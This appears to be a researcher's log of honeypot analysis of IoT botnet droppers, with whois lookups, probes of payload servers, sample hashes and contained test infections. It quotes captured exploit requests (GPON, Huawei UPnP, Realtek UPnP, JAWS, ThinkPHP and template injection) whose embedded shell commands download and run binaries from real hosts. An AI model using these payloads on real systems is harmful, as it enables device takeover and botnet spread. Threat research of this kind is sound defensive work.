e-mail: helpdesk@apnic.net
admin-c: HM20-AP
tech-c: NO4-AP
nic-hdl: AA1452-AP
remarks: Generated from irt object IRT-APNIC-AP
abuse-mailbox: helpdesk@apnic.net
mnt-by: APNIC-ABUSE
last-modified: 2020-05-19T06:01:41Z
source: APNIC
$ curl -i http://163.123.143.126/
HTTP/1.1 403 Forbidden
Date: Fri, 03 Feb 2023 19:07:01 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
$ curl -i http://163.123.143.126/bins/
HTTP/1.1 403 Forbidden
Date: Fri, 03 Feb 2023 19:08:55 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 207
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /bins/
on this server.</p>
</body></html>
Some interesting lines in the dropper, different IP to check and also some IPTables rules:
wget http://195.133.18.119/bins/dark.86_64; curl -O http://195.133.18.119/bins/dark.86_64;cat dark.86_64 >zyxlel;chmod +x *;./zyxlel zyxlel.exploit
iptables -F
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
iptables -A INPUT -p tcp --dport 9000 -j DROP
iptables -A INPUT -p tcp --dport 8089 -j DROP
iptables -A INPUT -p tcp --dport 7070 -j DROP
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 9090 -j DROP
iptables -A INPUT -p tcp --dport 161 -j DROP
iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp --dport 9600 -j DROP
iptables -A INPUT -p tcp --dport 21412 -j DROP
iptables -A INPUT -p tcp --dport 5986 -j DROP
iptables -A INPUT -p tcp --dport 5985 -j DROP
iptables -A INPUT -p tcp --dport 17998 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
iptables-save
domain: vzwebsite.ir
ascii: vzwebsite.ir
nserver: v1s1.xundns.com
nserver: v1s2.xundns.com
source: IRNIC # Filtered
vzwebsite.ir. 228 IN A 46.148.39.36
$ curl -i http://vzwebsite.ir/
HTTP/1.1 403 Forbidden
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
date: Thu, 09 Feb 2023 13:00:28 GMT
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
$ curl -i http://vzwebsite.ir/fuez/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:35 GMT
etag: "63d5606b-6"
accept-ranges: bytes
content-length: 6
date: Thu, 09 Feb 2023 12:59:38 GMT
rolled
$ curl -i http://vzwebsite.ir/siffredi/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:36 GMT
etag: W/"63d5606c-15"
transfer-encoding: chunked
date: Thu, 09 Feb 2023 13:01:01 GMT
rickrolledyoubitchies
strings:
cd /data/local/tmp && cd /tmp;rm -rf adb adb.sh; busybox wget http://vzwebsite.ir/adb/adb.sh -O vzwxz; chmod 777 vzwxz;./vzwxz ADB; curl -O http://vzwebsite.ir/adb/adb.sh; chmod 777 adb.sh; sh adb.sh ADB; rm -rf adb.sh vzwxz
$ curl -i http://vzwebsite.ir/adb/
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
last-modified: Sat, 28 Jan 2023 17:50:33 GMT
etag: "63d56069-8"
accept-ranges: bytes
content-length: 8
date: Thu, 09 Feb 2023 13:04:18 GMT
honeypot
Deliberate safe infection in a contained VM:
# file dlz.x86_64
dlz.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
# ./dlz.x86_64
Binary error: exec format not supported.
/
# file dlz.x86_64
dlz.x86_64: empty
Clearly deletes itself.
$ grep -E " DST=.* DPT=" contained_dlz.txt | sed -r "s/^.* DST=([^ ]+) .* DPT=([^ ]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail
3 239.85.203.76:8081
3 239.90.50.0:9000
3 239.92.161.134:5555
3 239.93.238.107:5555
3 239.95.147.183:8088
3 239.95.199.140:5555
3 239.97.153.165:5555
3 239.97.17.202:9000
3 239.99.1.152:8888
126 185.132.53.77:1963
$ nmap -Pn -p 21,22,80,443,8080,1963 185.132.53.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 22:58 UTC
Nmap scan report for 185.132.53.77
Host is up (0.022s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
1963/tcp open webmachine
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds
$ nc -vv 185.132.53.77 1963
185.132.53.77: inverse host lookup failed: Unknown host
(UNKNOWN) [185.132.53.77] 1963 (?) open
sent 0, rcvd 0
Really can’t tell if this is a working C2 server or not…
17:00 -!- Irssi: Looking up 185.132.53.77
17:00 -!- Irssi: Connecting to 185.132.53.77 [185.132.53.77] port 1963
17:00 -!- Irssi: Connection to 185.132.53.77 established
17:00 -!- Irssi: warning Connection reset by peer
17:00 -!- Irssi: Connection lost to 185.132.53.77
Doesn’t appear to be a working IRC server at least, or a port to listen on. It might have some crazy port knocking stuff but I’m not digging that deep.
irt: IRT-APNIC-AP
address: Brisbane, Australia
e-mail: helpdesk@apnic.net
abuse-mailbox: helpdesk@apnic.net
admin-c: HM20-AP
tech-c: NO4-AP
auth: # Filtered
remarks: APNIC is a Regional Internet Registry.
remarks: We do not operate the referring network and
remarks: are unable to investigate complaints of network abuse.
remarks: For information about IRT, see www.apnic.net/irt
remarks: helpdesk@apnic.net was validated on 2020-02-03
mnt-by: APNIC-HM
last-modified: 2020-02-03T02:04:33Z
source: APNIC
role: ABUSE APNICAP
address: Brisbane, Australia
country: ZZ
phone: +000000000
e-mail: helpdesk@apnic.net
admin-c: HM20-AP
tech-c: NO4-AP
nic-hdl: AA1452-AP
remarks: Generated from irt object IRT-APNIC-AP
abuse-mailbox: helpdesk@apnic.net
mnt-by: APNIC-ABUSE
last-modified: 2020-05-19T06:01:41Z
source: APNIC
$ curl -i http://163.123.142.241/
HTTP/1.1 200 OK
Date: Thu, 09 Feb 2023 23:08:02 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Fri, 03 Feb 2023 08:50:54 GMT
ETag: "29cd-5f3c7c78327b4"
Accept-Ranges: bytes
Content-Length: 10701
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
Deliberate infection:
InfectedNight did its job
inetnum: 1.234.0.0 - 1.255.255.255
netname: broadNnet
descr: SK Broadband Co Ltd
admin-c: IM670-AP
tech-c: IM670-AP
country: KR
status: ALLOCATED PORTABLE
mnt-by: MNT-KRNIC-AP
mnt-irt: IRT-KRNIC-KR
last-modified: 2017-02-03T00:38:09Z
source: APNIC
irt: IRT-KRNIC-KR
address: Jeollanam-do Naju-si Jinheung-gil
e-mail: irt@nic.or.kr
abuse-mailbox: irt@nic.or.kr
admin-c: IM574-AP
tech-c: IM574-AP
auth: # Filtered
remarks: irt@nic.or.kr was validated on 2020-04-09
mnt-by: MNT-KRNIC-AP
last-modified: 2021-06-15T06:21:49Z
source: APNIC
$ curl -i http://1.246.222.228:2200/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 95268
Connection: close
Content-Type: application/zip
$ curl -i http://1.246.222.228:2200/
HTTP/1.1 200 OK
Server: nginx
Content-Length: 95268
Connection: close
Content-Type: application/zip
proxy.akur.group. 87 IN A 113.30.191.198
inetnum: 113.30.188.0 - 113.30.191.255
netname: STUB-113-30-188SLASH22
descr: Transferred to the RIPE region on 2022-03-04T09:34:16Z.
country: ZZ
admin-c: STUB-AP
tech-c: STUB-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-STUB
mnt-irt: IRT-STUB-AP
last-modified: 2022-03-03T23:45:30Z
source: APNIC
irt: IRT-STUB-AP
address: N/A
e-mail: no-email@apnic.net
abuse-mailbox: no-email@apnic.net
admin-c: STUB-AP
tech-c: STUB-AP
auth: # Filtered
remarks: IRT for stub records.
remarks: We do not operate the referring network and
remarks: are unable to investigate complaints of network abuse.
remarks: For information about IRT, see www.apnic.net/irt
mnt-by: APNIC-HM
last-modified: 2019-09-23T05:22:43Z
source: APNIC
$ curl -i http://113.30.191.198/
HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 08:40:50 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sun, 12 Feb 2023 18:46:19 GMT
ETag: "0-5f4852573b275"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://113.30.191.198/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 08:41:15 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sun, 12 Feb 2023 18:46:19 GMT
ETag: "0-5f4852573b65d"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
strings in binary (despite being UPX compressed):
POST /cdn-cgi/
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://113.30.191.198/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g proxy.akur.group -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+proxy.akur.group/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
inetnum: 176.123.0.0 - 176.123.11.255
netname: AlexHost-NET
country: MD
org: ORG-ALEX2-RIPE
admin-c: SZ3268-RIPE
tech-c: SZ3268-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: CLOUDATAMD-MNT
mnt-routes: CLOUDATAMD-MNT
mnt-domains: CLOUDATAMD-MNT
created: 2019-09-03T08:35:42Z
last-modified: 2019-11-13T18:34:36Z
source: RIPE # Filtered
sponsoring-org: ORG-Vs35-RIPE
$ curl -i http://176.123.1.44/
HTTP/1.1 403 Forbidden
Date: Thu, 02 Mar 2023 07:59:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
Index of /lx
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] a 2023-02-06 12:36 32K
[ ] apep.arm 2023-02-06 12:36 31K
[ ] apep.arm5 2023-02-06 12:36 27K
[ ] apep.arm6 2023-02-06 12:36 36K
[ ] apep.arm7 2023-02-06 12:36 56K
[ ] apep.m68k 2023-02-06 12:36 106K
[ ] apep.mips 2023-02-06 12:36 34K
[ ] apep.mpsl 2023-02-06 12:36 35K
[ ] apep.ppc 2023-02-06 12:36 32K
[ ] apep.sh4 2023-02-06 12:36 81K
[ ] apep.spc 2023-02-06 12:36 93K
[ ] apep.x86 2023-02-06 12:36 32K
[ ] u 2023-02-06 12:36 34K
[ ] x 2023-02-06 12:36 34K
══════════════════════════════════════════════════════════════
a: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
apep.arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
apep.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
apep.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
apep.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
apep.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
apep.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
apep.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
apep.ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
apep.sh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
apep.spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
apep.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
u: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
x: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$(/bin/busybox wget -g 176.123.1.44 -l /tmp/monke -r /u; /bin/busybox chmod 777 * /tmp/monke; /tmp/monke selfrep.router)
GET /shell?cd+/tmp;wget+http://176.123.1.44/lx/apep.arm7+-O+p2d;+chmod+777+p2d;./p2d+laws.seflrep HTTP/1.1
User-Agent: Hello, pee
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
GET /index.php?s=/index/ hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://176.123.1.44/lx/apep.x86 -O /tmp/.apep; chmod 777 /tmp/.apep; /tmp/.apep ThinkphpRep' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Tsunami/2.0
Fake-out compromised Tor Exit Node.
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
update.rawupdater.cf. 3553 IN A 193.111.250.222
[Querying whois.dot.cf]
[whois.dot.cf]
The domain you requested is not known in Freenoms database.
inetnum: 193.111.250.192 - 193.111.250.223
netname: Mena-Hosting
country: DE
admin-c: MHDP2-RIPE
tech-c: MHDP2-RIPE
status: SUB-ALLOCATED PA
mnt-by: FZ-IP-MNT
mnt-by: mena-iheb-MNT
created: 2023-02-13T09:13:22Z
last-modified: 2023-02-13T09:13:29Z
source: RIPE
role: Mena Hosting DDoS Protection
address: Tunisia MH. LTC 2100
nic-hdl: MHDP2-RIPE
mnt-by: mena-iheb-MNT
created: 2023-02-11T17:17:05Z
last-modified: 2023-02-11T17:17:05Z
source: RIPE # Filtered
$ curl -i update.rawupdater.cf
HTTP/1.1 200 OK
Date: Thu, 02 Mar 2023 08:05:52 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 27 Feb 2023 21:09:41 GMT
ETag: "82d7-5f5b4e5c1d310"
Accept-Ranges: bytes
Content-Length: 33495
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<!-- saved from url=(0022)http://103.196.37.111/ -->
<html lang="en-US" class=" lmpzut idc0_346"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>This is a Tor Exit Router</title>
Checking the official Tor exit node list: https://check.torproject.org/torbulkexitlist
It turns out that the 103.196.37.111 IP in the HTML is actually a Tor exit node, however the 193.111.250.222 node is NOT listed. It could have the software configured but not listed, but most likely they just ripped the HTML off a Tor exit node as a fake display to trick people into thinking it is one. Clever technique, and a reminder here that you should always check the Tor exit node list if you encounter a server that says it is a Tor exit node for verification.
jaws file points to: 193.111.250.222, which is just what the DNS A record is.
$ wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl
--2023-03-02 02:11:03-- http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl
Resolving update.rawupdater.cf (update.rawupdater.cf)... 193.111.250.222
Connecting to update.rawupdater.cf (update.rawupdater.cf)|193.111.250.222|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-02 02:11:03 ERROR 404: Not Found.
db0fa4b8db0333367e9bda3ab68b8042.arc: ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
db0fa4b8db0333367e9bda3ab68b8042.arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.i686: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
db0fa4b8db0333367e9bda3ab68b8042.sh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
db0fa4b8db0333367e9bda3ab68b8042.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
(MD5)
91740099c681f23cc4c27ccf0287a589 db0fa4b8db0333367e9bda3ab68b8042.arc
3508af12fd8be4ccba5d3c386c2e6fda db0fa4b8db0333367e9bda3ab68b8042.arm
146bb7c27febd93adfad35dc45025ba9 db0fa4b8db0333367e9bda3ab68b8042.arm5
9a72ed27d39abead15e37863880b55eb db0fa4b8db0333367e9bda3ab68b8042.arm6
a0adebe3c335c94f3633a9afb7bbbab1 db0fa4b8db0333367e9bda3ab68b8042.arm7
e85297fad92d520569591a415ac6c8b6 db0fa4b8db0333367e9bda3ab68b8042.i686
d231d386e156f453450e225a7075e30a db0fa4b8db0333367e9bda3ab68b8042.m68k
12eaac62f4d046aa41b52035c4e2ea4e db0fa4b8db0333367e9bda3ab68b8042.mips
1ac3046524036eac4eab794aa0ffda7c db0fa4b8db0333367e9bda3ab68b8042.mpsl
fd9468288a2432269f7c3773919b5609 db0fa4b8db0333367e9bda3ab68b8042.ppc
5764527672b011b841d4c4d4a62a9324 db0fa4b8db0333367e9bda3ab68b8042.sh4
cc7ce67f4ec47858d88def70ed87b8bf db0fa4b8db0333367e9bda3ab68b8042.spc
7df88635caffe6c0749aa4e14885fd1c db0fa4b8db0333367e9bda3ab68b8042.x86
(SHA1)
53afe3593916ff0e7da04ce1c3ff610eb472f820 db0fa4b8db0333367e9bda3ab68b8042.arc
12a771c38182e4497666c337a746c6bb3875f023 db0fa4b8db0333367e9bda3ab68b8042.arm
e5d8caf3f66b92b0d1e56199e6aedf09cbc08ec5 db0fa4b8db0333367e9bda3ab68b8042.arm5
362d1ef5b2b82d9818a25c76df4da938b842d5f1 db0fa4b8db0333367e9bda3ab68b8042.arm6
e83b263a7e52946b120f190775dcde0cf81b5ed4 db0fa4b8db0333367e9bda3ab68b8042.arm7
1e285ee8e17f252ba4e66a7ebf33f318ad70292e db0fa4b8db0333367e9bda3ab68b8042.i686
20c2a7bf41395d6c7b93bade5049ea4620c173ce db0fa4b8db0333367e9bda3ab68b8042.m68k
b18b1cdecde8467d2e91b601503e6794da00a879 db0fa4b8db0333367e9bda3ab68b8042.mips
137cc2d26bd094b93dc48dd0f2edd3b7b5ec3f2a db0fa4b8db0333367e9bda3ab68b8042.mpsl
ca56ec23a54c0d63f839a1ed73e65ef3096d144d db0fa4b8db0333367e9bda3ab68b8042.ppc
30dcce0df3983fa3cf602900bc06559f33b833a5 db0fa4b8db0333367e9bda3ab68b8042.sh4
9d5d1f99b2d4963240952bc00ee355999d7b6ae6 db0fa4b8db0333367e9bda3ab68b8042.spc
86659eef9af060c639d1c66ec0e6db7b0c082723 db0fa4b8db0333367e9bda3ab68b8042.x86
(SHA256)
44cad51f03b4460be693eebed21362cf69d8d82a827876e144fe28ec47d98881 db0fa4b8db0333367e9bda3ab68b8042.arc
b0fe7070e55b6abb2fed30deb03c8f58050740831cd980b84655cb9a87ce116a db0fa4b8db0333367e9bda3ab68b8042.arm
5094525d666a5ac6ac1af5a614f9c171cb34a953e58b129738dc9f92c4167efd db0fa4b8db0333367e9bda3ab68b8042.arm5
24eea3987970cb20d1fb0636100582efadfecc2feee7402379d97f64d8efa4bc db0fa4b8db0333367e9bda3ab68b8042.arm6
74ef0f11bf5110aafa7330c38fc4853fc1d3ecf17b21f14bec2c0d7906982dd4 db0fa4b8db0333367e9bda3ab68b8042.arm7
36ed58b43e23a2c01146a85bba39f35dbcf13e318355a5398bca71e525f023db db0fa4b8db0333367e9bda3ab68b8042.i686
c2090b370410710ee348e8aeb2b84d377a9ed38d6c5e479c71ad8a32e9bfb374 db0fa4b8db0333367e9bda3ab68b8042.m68k
7dc81afbf7c80ac654dc7b662f562caed8aea870049ed2cfe66cb6216ee93230 db0fa4b8db0333367e9bda3ab68b8042.mips
eb0cbe2e7e47fc12792d0b1399984369ec1f2844507bc4c2fdbf1626e2e89aa1 db0fa4b8db0333367e9bda3ab68b8042.mpsl
1a1562c15fff97371b2e0982a414af9ee920fdf4917ae757b26d2014cc483b49 db0fa4b8db0333367e9bda3ab68b8042.ppc
99bcc0b0b335aac600a36a2ac5bde9e427881e6079b643515160d18aa17b1be8 db0fa4b8db0333367e9bda3ab68b8042.sh4
5fd0028d5a5a7e03510e1b49fe112747cb27d09499e952b5b34fcc9efc8b23a1 db0fa4b8db0333367e9bda3ab68b8042.spc
71117f9486e266ddf4baf684b1ba91bc419d5be3dfd2f6704a5c869458d903bc db0fa4b8db0333367e9bda3ab68b8042.x86
Strings of note (UPX compressed):
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf *mpsl; wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl -O noaie; chmod 777 noaie; ./noaie realteck`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf *mpsl; wget http://update.rawupdater.cf/db0fa4b8db0333367e9bda3ab68b8042.mpsl -O noaie; chmod 777 noaie; ./noaie realteck`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+update.rawupdater.cf/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
/usr/sbin/
var/Challenge
app/hi3511
usr/dvr_main _8182T_1108
mnt/mtd/app/gui
l0 c/udevd
anko-app/ankosample _8182T_1104
var/tmp/sonia
stm_hi3511_dvr
/bin/busybox
/usr/lib/systemd/systemd
/usr/libexec/openssh/sftp-server
home/Davinci
/var/spool
/var/Sofia
/root/dvr_gui/
/root/dvr_app/
/anko-app/
Deliberate (safe) isolated infection:
unstable_is_the_history_of_universe
Targets mapped using some variation of:
$ cat contained_tor.txt | grep DPT= | sed -r "s/^.*DST=([^ ]+) .* DPT=([0-9]+) .*$/\1,\2/g" | sort | uniq -c | sed -r "s/^[ \t]+([0-9]+)[ \t]+/\1,/g"
(head)
1,100.0.0.200,52869
1,100.0.113.57,80
1,100.0.140.73,23
1,100.0.141.164,52869
1,100.0.15.118,80
1,100.0.155.248,52869
1,100.0.16.183,52869
1,100.0.166.72,23
1,100.0.175.128,52869
1,100.0.179.64,52869
(tail)
1,99.99.229.91,80
1,99.99.234.31,23
1,99.99.242.176,23
1,99.99.42.131,23
1,99.99.49.218,52869
1,99.99.50.224,23
1,99.99.61.177,80
1,99.99.87.213,23
1,99.99.92.57,23
1,99.99.97.93,80
With a wc -l (line count) of 1226759. Seems evenly distributed, no C2 server. Probably a DDoS-for-hire service. Targets may be generative, or not, can’t tell. Ports are definitely not random.
From:
GET /page?id=2MQ7rcejZXwLnVqhktMnLk4XNG3&settings[view%20options][outputFunctionName]=xprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me%27)s HTTP/1.1\x0d\x0aHost: 46.148.26.81\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\x0d\x0aConnection: close\x0d\x0aAccept-Encoding: gzip\x0d\x0a\x0d\x0a
cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me. 3552 IN A 178.128.209.14
inetnum: 178.128.208.0 - 178.128.223.255
netname: DIGITALOCEAN
country: SG
admin-c: PT7353-RIPE
tech-c: PT7353-RIPE
status: ASSIGNED PA
mnt-by: digitalocean
created: 2019-04-17T13:57:12Z
last-modified: 2019-04-17T13:57:12Z
source: RIPE
person: DigitalOcean Network Operations
address: 101 Ave of the Americas, FL2
address: New York, NY, 10013
address: United States of America
phone: +13478756044
nic-hdl: PT7353-RIPE
mnt-by: digitalocean
created: 2015-03-11T16:37:07Z
last-modified: 2022-08-23T13:31:16Z
